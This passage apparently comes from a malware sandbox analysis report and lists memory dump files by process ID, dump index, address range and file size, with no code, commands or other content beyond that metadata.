104KB
-
memory/1692-239-0x0000000007D20000-0x0000000007D2E000-memory.dmpFilesize
56KB
-
memory/1692-238-0x0000000007D60000-0x0000000007DF6000-memory.dmpFilesize
600KB
-
memory/1692-235-0x0000000007B70000-0x0000000007B7A000-memory.dmpFilesize
40KB
-
memory/1692-232-0x0000000008190000-0x000000000880A000-memory.dmpFilesize
6.5MB
-
memory/1692-219-0x0000000007780000-0x00000000077B2000-memory.dmpFilesize
200KB
-
memory/1692-186-0x0000000002EC0000-0x0000000002EF6000-memory.dmpFilesize
216KB
-
memory/1828-210-0x0000000000400000-0x00000000017ED000-memory.dmpFilesize
19.9MB
-
memory/1828-229-0x00000000034A0000-0x0000000003574000-memory.dmpFilesize
848KB
-
memory/1828-184-0x0000000001A1E000-0x0000000001A99000-memory.dmpFilesize
492KB
-
memory/1828-228-0x0000000001A1E000-0x0000000001A99000-memory.dmpFilesize
492KB
-
memory/2088-147-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2088-151-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2088-146-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2088-148-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2088-150-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2088-200-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2088-145-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2088-149-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2088-201-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2088-152-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2088-202-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2088-203-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2188-192-0x0000000004C50000-0x0000000004C6E000-memory.dmpFilesize
120KB
-
memory/2188-215-0x0000000004E40000-0x0000000004E41000-memory.dmpFilesize
4KB
-
memory/2188-185-0x0000000000450000-0x00000000004C6000-memory.dmpFilesize
472KB
-
memory/2188-189-0x0000000004C90000-0x0000000004D06000-memory.dmpFilesize
472KB
-
memory/2188-208-0x0000000073420000-0x0000000073BD0000-memory.dmpFilesize
7.7MB
-
memory/2188-197-0x0000000005400000-0x00000000059A4000-memory.dmpFilesize
5.6MB
-
memory/3020-338-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-307-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-317-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-318-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-312-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-287-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-236-0x0000000003120000-0x0000000003135000-memory.dmpFilesize
84KB
-
memory/3020-296-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3020-302-0x00000000031B0000-0x00000000031C0000-memory.dmpFilesize
64KB
-
memory/3120-198-0x00007FFC075F0000-0x00007FFC080B1000-memory.dmpFilesize
10.8MB
-
memory/3120-172-0x0000000000810000-0x000000000082E000-memory.dmpFilesize
120KB
-
memory/3124-364-0x0000000000400000-0x0000000000631000-memory.dmpFilesize
2.2MB
-
memory/3156-372-0x0000000010000000-0x0000000010D56000-memory.dmpFilesize
13.3MB
-
memory/3624-214-0x0000000000400000-0x0000000002B6B000-memory.dmpFilesize
39.4MB
-
memory/3624-178-0x0000000002D28000-0x0000000002D51000-memory.dmpFilesize
164KB
-
memory/3624-212-0x0000000002D28000-0x0000000002D51000-memory.dmpFilesize
164KB
-
memory/3624-213-0x0000000002CC0000-0x0000000002D08000-memory.dmpFilesize
288KB
-
memory/3888-179-0x0000000140000000-0x0000000140650000-memory.dmpFilesize
6.3MB
-
memory/3932-196-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/3932-174-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4216-272-0x0000000000DD0000-0x0000000000E17000-memory.dmpFilesize
284KB
-
memory/4216-289-0x0000000071AE0000-0x0000000071B69000-memory.dmpFilesize
548KB
-
memory/4216-278-0x0000000000C80000-0x0000000000C81000-memory.dmpFilesize
4KB
-
memory/4216-267-0x0000000000270000-0x00000000003DB000-memory.dmpFilesize
1.4MB
-
memory/4216-277-0x0000000077940000-0x0000000077B55000-memory.dmpFilesize
2.1MB
-
memory/4216-321-0x000000006F450000-0x000000006F49C000-memory.dmpFilesize
304KB
-
memory/4216-273-0x0000000000C60000-0x0000000000C61000-memory.dmpFilesize
4KB
-
memory/4216-305-0x0000000076930000-0x0000000076EE3000-memory.dmpFilesize
5.7MB
-
memory/4216-283-0x0000000000270000-0x00000000003DB000-memory.dmpFilesize
1.4MB
-
memory/4216-269-0x0000000000270000-0x00000000003DB000-memory.dmpFilesize
1.4MB
-
memory/4264-242-0x0000000003EC0000-0x000000000407E000-memory.dmpFilesize
1.7MB
-
memory/4400-335-0x000000000057D000-0x00000000005CD000-memory.dmpFilesize
320KB
-
memory/4696-230-0x0000000005830000-0x0000000005842000-memory.dmpFilesize
72KB
-
memory/4696-227-0x0000000073420000-0x0000000073BD0000-memory.dmpFilesize
7.7MB
-
memory/4696-233-0x00000000058A0000-0x00000000058DC000-memory.dmpFilesize
240KB
-
memory/4696-222-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4696-237-0x0000000005690000-0x0000000005CA8000-memory.dmpFilesize
6.1MB
-
memory/4696-226-0x0000000005CB0000-0x00000000062C8000-memory.dmpFilesize
6.1MB
-
memory/4696-231-0x0000000005960000-0x0000000005A6A000-memory.dmpFilesize
1.0MB
-
memory/4828-271-0x00000000006E8000-0x000000000070F000-memory.dmpFilesize
156KB
-
memory/4892-366-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4892-368-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4892-365-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4992-282-0x0000000002290000-0x0000000002291000-memory.dmpFilesize
4KB
-
memory/4992-309-0x0000000076930000-0x0000000076EE3000-memory.dmpFilesize
5.7MB
-
memory/4992-323-0x000000006F450000-0x000000006F49C000-memory.dmpFilesize
304KB
-
memory/4992-300-0x0000000071AE0000-0x0000000071B69000-memory.dmpFilesize
548KB
-
memory/4992-275-0x00000000022B0000-0x00000000022F7000-memory.dmpFilesize
284KB
-
memory/4992-291-0x0000000077940000-0x0000000077B55000-memory.dmpFilesize
2.1MB
-
memory/4992-280-0x0000000000650000-0x00000000007BD000-memory.dmpFilesize
1.4MB
-
memory/5068-314-0x0000000076930000-0x0000000076EE3000-memory.dmpFilesize
5.7MB
-
memory/5068-330-0x000000006F450000-0x000000006F49C000-memory.dmpFilesize
304KB
-
memory/5068-303-0x0000000071AE0000-0x0000000071B69000-memory.dmpFilesize
548KB
-
memory/5068-293-0x0000000077940000-0x0000000077B55000-memory.dmpFilesize
2.1MB
-
memory/5068-288-0x0000000000BD0000-0x0000000000BD1000-memory.dmpFilesize
4KB
-
memory/5068-276-0x0000000002940000-0x0000000002986000-memory.dmpFilesize
280KB